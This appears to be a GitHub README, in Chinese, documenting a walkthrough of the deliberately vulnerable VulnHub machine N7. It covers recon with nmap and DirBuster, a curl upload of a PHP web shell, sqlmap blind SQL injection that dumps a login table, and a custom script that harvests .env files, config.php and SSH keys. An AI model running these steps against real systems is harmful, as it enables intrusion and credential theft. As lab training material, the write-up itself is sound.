MoriartyPuth-Labs/N7-Lab

GitHub: MoriartyPuth-Labs/N7-Lab

记录对 VulnHub 靶机 N7 的完整 Web 渗透过程，涵盖从信息收集到数据库窃取的全攻击链，并展示了自研后渗透框架 bubble_siphon 的实战用法。

Stars: 0 | Forks: 0

# 🫧 Lab N7: Web 渗透利用与数据库窃取 Lab N7 Banner

![平台](https://img.shields.io/badge/Platform-VulnHub-blue?style=for-the-badge&logo=linux&logoColor=white) ![难度](https://img.shields.io/badge/Difficulty-Medium-yellow?style=for-the-badge) ![攻击向量](https://img.shields.io/badge/Vector-Web%20Exploitation-red?style=for-the-badge&logo=html5&logoColor=white) ![SQLi](https://img.shields.io/badge/SQLi-Blind%20Time--Based-critical?style=for-the-badge&logo=mysql&logoColor=white) ![工具](https://img.shields.io/badge/Tools-SQLmap%20%7C%20DirBuster%20%7C%20curl-orange?style=for-the-badge) ![Flag](https://img.shields.io/badge/Flag-Captured%20%F0%9F%8F%86-success?style=for-the-badge)

## 📌 关于此 Lab 本仓库记录了对 **[Web Machine: (N7)](https://www.vulnhub.com/entry/web-machine-n7,756/)** 的完整渗透测试与数据窃取过程 —— 这是一个由 **Duty Mastr** 创建并于 **2021 年 11 月 3 日** 发布的故意存在漏洞的虚拟机。本次测试使用了自定义的渗透利用框架 [**bubble_siphon**](https://github.com/MoriartyPuth/bubble-siphon)，对目标主机进行了信息收集，发现了隐藏的入口点，并从底层数据库中提取了敏感凭据和 Flag。 | 字段 | 详情 | |---|---| | 🖥️ 机器名称 | Web Machine: (N7) | | ⚡ 难度 | 中等 | | 📦 格式 | VirtualBox OVA | | 🐧 操作系统 | Linux | | 🌐 网络 | DHCP / 桥接 | | 🎯 主要攻击向量 | 基于 Web 的漏洞 | | 🏆 Flag | `FLAG{N7:KSA_01}` | ## 🗺️ 攻击链 ``` [Host Discovery] → [Port Scan] → [Directory Fuzzing] → [Hidden Portal] → [Upload Bypass + curl] → [Partial Flag] → [Blind SQLi] → [DB Dump] → [Credential Recovery] → [FLAG 🏆] ``` ## 🛠️ 方法论 ### 1️⃣ 网络枚举与目标验证 Lab 环境配置为**桥接网络**，以实现 Kali 攻击机与目标虚拟机之间的直接通信。 ``` # Host 发现 sudo arp-scan -l ``` ![主机发现](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/c962af7db9181258.png) ``` # 完整服务扫描 nmap -sCV -T4 ``` ### 2️⃣ 目录与参数模糊测试使用标准字典的初始扫描返回结果极少。通过使用 **DirBuster** 进行更具攻击性的自定义字典爆破，最终成功突破。 ![模糊测试](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/b472d9e27d181300.png) **发现的关键端点：** | 端点 | 用途 | |---|---| | `/exploit.html` | 隐藏的上传表单 | | `/enter_network` | 管理员登录网关 | ![端点发现](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/d08ba0a3d9181301.jpg) ### 3️⃣ 漏洞利用与横向移动 #### 🔓 上传表单绕过 `/exploit.html` 的上传表单存在配置错误 —— 其 action 指向了 `localhost`，导致基于浏览器的提交无效。通过构造直接发往后端处理程序的 `POST` 请求，轻松绕过了此限制。 ``` curl -X POST http:///profile.php \ -F "file=@shell.php" \ -v ``` ![curl 漏洞利用](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/90dc32ea13181303.png) #### 💉 通过 `/enter_network` 实现的盲注 SQL 注入发现 `/enter_network` 的登录表单中，`user` 参数存在 SQL 注入漏洞。通过在 `sqlmap` 中设置较高的 risk 和 level 参数，确认了基于时间的盲注。 ``` sqlmap -u "http:///enter_network/index.php" \ --data="user=admin&pass=admin" \ --level 3 \ --risk 3 \ --dbms=mysql \ --batch ``` ![SQLmap](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/04881d3f81181304.png) ### 4️⃣ 后渗透与数据窃取 #### 🗄️ 数据库提取确认注入漏洞后，将 `sqlmap` 指向 **Machine** 数据库，对 `login` 表进行转储。 ``` sqlmap -u "http:///enter_network/index.php" \ --data="user=admin&pass=admin" \ -D Machine \ -T login \ --dump \ --batch ``` ![数据库转储](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/4d3e58bf59181305.png) #### 🫧 bubble_siphon 部署在取得权限后，部署了自定义的 **`bubble_siphon.sh`** 框架，以清除 Web 根目录中的配置秘密。 ``` # 分析 Web 服务器身份 whoami # → www-data # 搜寻 /var/www/ 中的配置 secrets ./bubble_siphon.sh --target /var/www/ --hunt .env,config.php ``` 旨在提取的文件包括：`.env` 文件、`config.php`、SSH 密钥以及 Web 目录中任何硬编码的凭据。 ## 🧰 工具与框架 | 工具 | 作用 | |---|---| | 🫧 [`bubble_siphon.sh`](https://github.com/MoriartyPuth/bubble-siphon) | 自定义后渗透与机密信息收集框架 | | 💉 `sqlmap` | 自动化的盲注 SQL 注入与数据库转储 | | 📁 `DirBuster` / `FFUF` | 目录暴力破解与端点发现 | | 🌐 `curl` | 手动 HTTP 请求构造与上传绕过 | | 🔍 `nmap` | 端口扫描与服务探测 | | 📡 `arp-scan` | 本地子网主机发现 | ## 🏆 最终 Flag

``` █▀▀ █░░ ▄▀█ █▀▀ █▀░ █▄▄ █▀█ █▄█ FLAG{N7:KSA_01} ```

## ⚠️ 免责声明

标签：bubble_siphon, CISA项目, DirBuster, MISP, SQLMap, VulnHub, Web安全, 协议分析, 大数据, 应用安全, 数据库脱裤, 数据泄露, 数据窃取, 文件上传绕过, 时间盲注, 权限提升, 漏洞复现, 目录扫描, 盲注, 网络安全, 网络安全实验, 网络安全审计, 蓝队分析, 隐私保护